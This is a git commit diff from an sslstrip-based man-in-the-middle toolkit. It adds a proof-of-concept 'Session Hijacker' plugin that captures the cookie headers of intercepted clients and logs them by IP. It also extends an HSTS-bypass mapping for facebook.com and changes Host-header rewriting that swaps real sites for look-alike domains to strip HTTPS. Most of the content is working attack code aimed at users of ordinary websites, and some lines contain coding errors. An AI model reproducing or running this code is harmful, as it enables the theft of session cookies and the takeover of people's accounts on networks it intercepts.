added PoC session hijacking plugin

2025-07-07 21:42:17 -07:00 · 2014-11-26 20:01:28 +01:00 · 2014-11-26 20:01:28 +01:00 · e4cf519356
commit e4cf519356
parent e2132a6ca9
7 changed files with 69 additions and 17 deletions
--- a/config_files/hsts_bypass.cfg
+++ b/config_files/hsts_bypass.cfg
@ -8,3 +8,4 @@ accounts.google.se = cuentas.google.se

 #for facebook
 www.facebook.com = social.facebook.com
+facebook.com = social.facebook.com
--- a/plugins/SessionHijacker.py
+++ b/plugins/SessionHijacker.py
@ -0,0 +1,30 @@
+from plugins.plugin import Plugin
+import os
+import argparse
+import logging
+
+class SessionHijacker(Plugin):
+	name = "Session Hijacker"
+	optname = "hijack"
+	desc = "Performs session hijacking attacks against clients"
+	implements = ["sendHeaders"]
+	has_opts = False
+
+	def initialize(self, options):
+		'''Called if plugin is enabled, passed the options namespace'''
+		self.options = options
+		self.log_clients = options.clients
+
+	def sendHeaders(self, request):
+		for header, value in request.headers.items():
+			if header == 'cookie':
+				if self.log_clients:
+					log_file = open('./logs/%s.log', 'a' % request.client.getClientIP())
+					log_file.write(request.header['host'], value, "\n")
+					log_file.close()
+
+					logging.info("%s %s << Wrote cookie to logfile" % (request.client.getClientIP(), request.headers['host']))
+				else:
+					logging.info("%s %s << Got cookie: %s" % (request.client.getClientIP(), request.headers['host'], value))
+
+	#def add_options(options):
--- a/sslstrip/ClientRequest.py
+++ b/sslstrip/ClientRequest.py
@ -94,7 +94,10 @@ class ClientRequest(Request):
        client            = self.getClientIP()
        path              = self.getPathFromUri()

+        try:
            self.content.seek(0,0)
+        except:
+            pass
        postData          = self.content.read()
        url               = 'http://' + host + path

--- a/sslstrip/ClientRequestHSTS.py
+++ b/sslstrip/ClientRequestHSTS.py
@ -76,11 +76,22 @@ class ClientRequest(Request):
        	del headers['if-none-match']
        	
        if 'host' in headers:
-        	host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
-        	logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host))
-        	headers['host'] = host
+            real_host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
+        	#logging.info("Modifing HOST header: %s -> %s" % (headers['host'],host))
+            if 'www.' in real_host:
+                fake_host = 'w' + real_host
+                headers['host'] = fake_host
+                fake_host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
                headers['securelink'] = '1'
-        	self.setHeader('Host',host)
+                self.setHeader('Host', fake_host)
+                logging.info("Modifing HOST header: %s -> %s" % (real_host,fake_host))
+            else:
+                fake_host = 'web' + real_host
+                headers['host'] = fake_host
+                fake_host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
+                headers['securelink'] = '1'
+                self.setHeader('Host', fake_host)
+                logging.info("Modifing HOST header: %s -> %s" % (real_host,fake_host))

        return headers

@ -112,7 +123,12 @@ class ClientRequest(Request):
        host = self.urlMonitor.URLgetRealHost("%s" % lhost)
        client = self.getClientIP()
        path = self.getPathFromUri()
+
+        try:
            self.content.seek(0, 0)
+        except:
+            pass
+
        postData = self.content.read()
        real = self.urlMonitor.real
        patchDict = self.urlMonitor.patchDict
--- a/sslstrip/ServerConnection.py
+++ b/sslstrip/ServerConnection.py
@ -54,7 +54,7 @@ class ServerConnection(HTTPClient):

    def sendRequest(self):
        if self.command == 'GET':
-            logging.info("%s Sending Request: %s %s"  % (self.client.getClientIP(), self.command, self.headers['host']))
+            logging.info("%s Sending Request: %s %s %s"  % (self.client.getClientIP(), self.command, self.headers['host'], self.headers['user-agent']))
        self.plugins.hook()
        self.sendCommand(self.command, self.uri)

@ -100,8 +100,8 @@ class ServerConnection(HTTPClient):
            if (value.find('gzip') != -1):
                logging.debug("Response is compressed...")
                self.isCompressed = True
-        if (key.lower() == 'strict-transport-security'):
-            value = 'max-age=0'
+        #if (key.lower() == 'strict-transport-security'):
+        #    value = 'max-age=0'

        elif (key.lower() == 'content-length'):
            self.contentLength = value
--- a/sslstrip/ServerConnectionFactory.py
+++ b/sslstrip/ServerConnectionFactory.py
@ -40,5 +40,7 @@ class ServerConnectionFactory(ClientFactory):
            logging.debug("Retrying via SSL")
            self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
        else:
+            try:
                self.client.finish()
-
+            except:
+                pass
--- a/sslstrip/URLMonitorHSTS.py
+++ b/sslstrip/URLMonitorHSTS.py
@ -71,7 +71,7 @@ class URLMonitor:
            else:
        		self.sustitucion[host] = "web"+host
        		self.real["web"+host] = host
-        	#logging.info("LEO: ssl host      (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
+            logging.info("LEO: ssl host      (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
        		
        url = 'http://' + host + path
        #logging.debug("LEO stripped URL: %s %s"%(client, url))